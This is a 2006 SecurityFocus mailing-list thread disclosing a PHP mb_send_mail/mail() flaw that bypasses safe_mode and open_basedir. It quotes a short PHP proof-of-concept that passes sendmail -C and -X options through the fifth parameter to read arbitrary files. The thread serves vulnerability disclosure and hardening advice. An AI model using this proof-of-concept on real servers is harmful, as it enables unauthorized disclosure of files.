(PHP) mb_send_mail security bypass Feb 28 2006 06:52PM
ced clerget free fr (1 replies)
Re: (PHP) mb_send_mail security bypass Mar 01 2006 03:14PM
Yasuo Ohgaki (yohgaki ohgaki net)
You should check mail() also...

mail() has exactly the same issue, since both mail() and mb_send_mail() applies
php_escape_shell_cmd() to 5th parameter.

Since the PoC is feeding usual options to sendmail command, php_escape_shell_cmd()
is useless for this kind of code.

Solution:
DO NOT TRUST safe_mode and open_basedir, since they are *FAIL* safe features for script bugs.
Safe_mode and open_basedir are not for the protection against PHP code writers.

By the way, php_escape_shell_cmd() is not applied to force_extra_parameter php.ini setting.
(force_extra_paremeter is INI_PERDIR|INI_SYSTEM setting)
Attackers can do much more with this feature if one would like to.

--
Yasuo Ohgaki

ced.clerget (at) free (dot) fr [email concealed] wrote:
> Vulnerable: PHP4, PHP5
> with use of sendmail 8.13.4 ><
>
> When safemode disabled and open_basedir restriction in effect, we can pass extra parameters
> to sendmail command in mail function, especially the -C and -X arguments.
> -C for alternate configuration file
> -X to log all in a file
> Can be used to view files, pass the file to view to C argument and store content in file
> passed to X argument.
>
> When safemode enabled and open_basedir restriction in effect, we can pass extra parameters
> to sendmail command in mb_send_mail function.
>
> Solution:
> Use other sendmail command and don't allow extra parameters for mb_send_mail when safemode enabled
>
> <?php
> if (isset($_REQUEST['file'])) {
> $file = "sendlog";
> if (file_exists($file)) unlink($file);
> $extra = "-C ".$_REQUEST['file']." -X ".getcwd()."/".$file;
> mb_send_mail(NULL, NULL, NULL, NULL, $extra);
> echo "<pre>".file_get_contents($file)."</pre>";
> }
> ?>
>
>
>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus